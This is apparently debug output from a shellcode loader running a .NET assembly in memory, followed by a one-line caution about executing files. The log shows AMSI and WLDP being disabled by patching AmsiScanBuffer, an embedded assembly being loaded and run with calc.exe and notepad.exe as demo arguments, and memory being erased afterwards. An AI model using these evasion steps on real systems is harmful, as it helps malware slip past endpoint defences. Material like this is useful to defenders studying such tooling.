DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
```
Obviously you should be cautious with what files you decide to execute on your machine.